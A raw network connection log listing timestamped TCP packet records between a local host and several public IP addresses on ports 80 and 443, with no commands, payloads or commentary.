                                                                                                                                                                    Sep 30, 2024 18:58:28.546757936 CEST49706443192.168.2.7203.101.184.118
                                                                                                                                                                    Sep 30, 2024 18:58:28.555219889 CEST49706443192.168.2.7203.101.184.118
                                                                                                                                                                    Sep 30, 2024 18:58:28.555238008 CEST44349706203.101.184.118192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:30.545582056 CEST49712443192.168.2.7142.250.186.36
                                                                                                                                                                    Sep 30, 2024 18:58:30.545666933 CEST44349712142.250.186.36192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:30.545795918 CEST49712443192.168.2.7142.250.186.36
                                                                                                                                                                    Sep 30, 2024 18:58:30.546041012 CEST49712443192.168.2.7142.250.186.36
                                                                                                                                                                    Sep 30, 2024 18:58:30.546077013 CEST44349712142.250.186.36192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:31.191054106 CEST44349712142.250.186.36192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:31.191468954 CEST49712443192.168.2.7142.250.186.36
                                                                                                                                                                    Sep 30, 2024 18:58:31.191539049 CEST44349712142.250.186.36192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:31.194000006 CEST44349712142.250.186.36192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:31.194086075 CEST49712443192.168.2.7142.250.186.36
                                                                                                                                                                    Sep 30, 2024 18:58:31.195322037 CEST49712443192.168.2.7142.250.186.36
                                                                                                                                                                    Sep 30, 2024 18:58:31.195491076 CEST44349712142.250.186.36192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:31.299670935 CEST49712443192.168.2.7142.250.186.36
                                                                                                                                                                    Sep 30, 2024 18:58:31.299745083 CEST44349712142.250.186.36192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:31.309214115 CEST4971480192.168.2.7172.67.149.9
                                                                                                                                                                    Sep 30, 2024 18:58:31.314501047 CEST8049714172.67.149.9192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:31.314765930 CEST4971480192.168.2.7172.67.149.9
                                                                                                                                                                    Sep 30, 2024 18:58:31.315795898 CEST4971480192.168.2.7172.67.149.9
                                                                                                                                                                    Sep 30, 2024 18:58:31.320816040 CEST8049714172.67.149.9192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:31.500091076 CEST49712443192.168.2.7142.250.186.36
                                                                                                                                                                    Sep 30, 2024 18:58:31.779834986 CEST8049714172.67.149.9192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:31.792655945 CEST49715443192.168.2.7172.67.149.9
                                                                                                                                                                    Sep 30, 2024 18:58:31.792700052 CEST44349715172.67.149.9192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:31.792773008 CEST49715443192.168.2.7172.67.149.9
                                                                                                                                                                    Sep 30, 2024 18:58:31.946671009 CEST4971480192.168.2.7172.67.149.9
                                                                                                                                                                    Sep 30, 2024 18:58:32.179547071 CEST49715443192.168.2.7172.67.149.9
                                                                                                                                                                    Sep 30, 2024 18:58:32.179564953 CEST44349715172.67.149.9192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:32.731446981 CEST44349715172.67.149.9192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:32.731522083 CEST49715443192.168.2.7172.67.149.9
                                                                                                                                                                    Sep 30, 2024 18:58:32.734462023 CEST49715443192.168.2.7172.67.149.9
                                                                                                                                                                    Sep 30, 2024 18:58:32.734472990 CEST44349715172.67.149.9192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:32.734728098 CEST44349715172.67.149.9192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:32.779416084 CEST49715443192.168.2.7172.67.149.9
                                                                                                                                                                    Sep 30, 2024 18:58:32.827405930 CEST44349715172.67.149.9192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:33.236777067 CEST49701443192.168.2.7104.98.116.138
                                                                                                                                                                    Sep 30, 2024 18:58:33.237298965 CEST49717443192.168.2.7104.98.116.138
                                                                                                                                                                    Sep 30, 2024 18:58:33.237365961 CEST44349717104.98.116.138192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:33.237449884 CEST49717443192.168.2.7104.98.116.138
                                                                                                                                                                    Sep 30, 2024 18:58:33.238133907 CEST49717443192.168.2.7104.98.116.138
                                                                                                                                                                    Sep 30, 2024 18:58:33.238151073 CEST44349717104.98.116.138192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:33.383447886 CEST44349715172.67.149.9192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:33.383672953 CEST44349715172.67.149.9192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:33.383729935 CEST49715443192.168.2.7172.67.149.9
                                                                                                                                                                    Sep 30, 2024 18:58:33.384659052 CEST44349701104.98.116.138192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:33.403439999 CEST49715443192.168.2.7172.67.149.9
                                                                                                                                                                    Sep 30, 2024 18:58:34.891241074 CEST49677443192.168.2.720.50.201.200
                                                                                                                                                                    Sep 30, 2024 18:58:35.314608097 CEST49718443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:58:35.314663887 CEST4434971852.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:35.314728022 CEST49718443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:58:35.316095114 CEST49718443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:58:35.316106081 CEST4434971852.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:35.963433981 CEST4971980192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:35.968393087 CEST8049719188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:35.968466997 CEST4971980192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:35.969408035 CEST4971980192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:35.974258900 CEST8049719188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:35.989357948 CEST4434971852.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:35.989440918 CEST49718443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:58:35.997745991 CEST49718443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:58:35.997775078 CEST4434971852.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:35.998013973 CEST4434971852.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:36.203696966 CEST49718443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:58:36.444175005 CEST8049719188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:36.446531057 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:36.446578979 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:36.446690083 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:36.449765921 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:36.449784040 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:36.522089005 CEST4971980192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:36.764373064 CEST49718443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:58:36.811399937 CEST4434971852.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:36.911149979 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:36.911217928 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:36.913342953 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:36.913350105 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:36.913611889 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:36.919445992 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:36.963413954 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:36.986767054 CEST4434971852.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:36.986793995 CEST4434971852.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:36.986802101 CEST4434971852.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:36.986830950 CEST4434971852.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:36.986841917 CEST4434971852.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:36.986850977 CEST4434971852.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:36.986865997 CEST49718443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:58:36.986879110 CEST4434971852.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:36.986923933 CEST49718443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:58:36.986949921 CEST49718443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:58:36.987544060 CEST4434971852.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:36.987552881 CEST4434971852.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:36.987576962 CEST4434971852.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:36.987626076 CEST49718443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:58:36.987637043 CEST4434971852.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:36.987663984 CEST49718443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:58:36.987677097 CEST49718443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:58:37.681583881 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.681641102 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.681677103 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.681741953 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.681756973 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.681890011 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.681919098 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.681922913 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.681932926 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.681982040 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.681994915 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.682001114 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.682049036 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.682049990 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.682059050 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.682099104 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.682105064 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.682218075 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.686357975 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.686402082 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.686429977 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.686474085 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.686480045 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.686521053 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.686532974 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.686803102 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.686845064 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.686847925 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.686853886 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.686898947 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.686904907 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.687622070 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.687654972 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.687675953 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.687681913 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.687774897 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.687813044 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.687819004 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.688117981 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.688659906 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.688729048 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.688750982 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.688851118 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.688858986 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.688982964 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.691683054 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.691729069 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.691811085 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.691871881 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.691878080 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.711194038 CEST49718443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:58:37.711229086 CEST4434971852.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.711287022 CEST49718443192.168.2.752.165.165.26
                                                                                                                                                                    Sep 30, 2024 18:58:37.711293936 CEST4434971852.165.165.26192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.735213995 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.739152908 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.739237070 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.739269018 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.739299059 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.739350080 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.739350080 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.739358902 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.739558935 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.739589930 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.739623070 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.739630938 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.739641905 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.739702940 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.740861893 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.740931034 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.741043091 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.741108894 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.741113901 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.782085896 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.811486006 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.811496019 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.811534882 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.811557055 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.811575890 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.811587095 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.811604023 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.811652899 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.811652899 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.811661005 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.812088966 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.812150002 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.812155962 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.812211990 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.812223911 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.812269926 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.812293053 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.812325954 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.812344074 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.812356949 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.812575102 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.812943935 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.813019991 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.824460030 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.824513912 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.933382034 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.933536053 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.933551073 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.933605909 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.933630943 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.933708906 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.933731079 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.933738947 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.933758974 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.933779955 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.934492111 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.934580088 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.934586048 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.934633970 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.934644938 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.934648037 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.934691906 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.935240030 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.935302973 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:37.935306072 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.935314894 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:37.935379028 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.063450098 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.063522100 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.063551903 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.063560963 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.063613892 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.063776970 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.063847065 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.063853025 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.063951969 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.063983917 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.064060926 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.064388990 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.064459085 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.064831972 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.064930916 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.064954042 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.064959049 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.065061092 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.110366106 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.110387087 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.157087088 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.365487099 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.365542889 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.365566015 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.365575075 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.365592003 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.365606070 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.365650892 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.365650892 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.365655899 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.365832090 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.365873098 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.365878105 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.365967035 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.366029978 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.366075993 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.366101980 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.366106033 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.366112947 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.366125107 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.366139889 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.366183043 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.366183043 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.366188049 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.366472006 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.366679907 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.366683960 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.367620945 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.367641926 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.367681980 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.367686987 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.367723942 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.367856026 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.372261047 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.372317076 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.482882977 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.482923985 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.483000040 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.483005047 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.483026981 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.483048916 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.498910904 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.498985052 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.499042988 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.499042988 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.499047995 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.499598026 CEST44349721188.114.97.3192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:38.499686003 CEST49721443192.168.2.7188.114.97.3
                                                                                                                                                                    Sep 30, 2024 18:58:38.499691010 CEST44349721188.114.97.3192.168.2.7
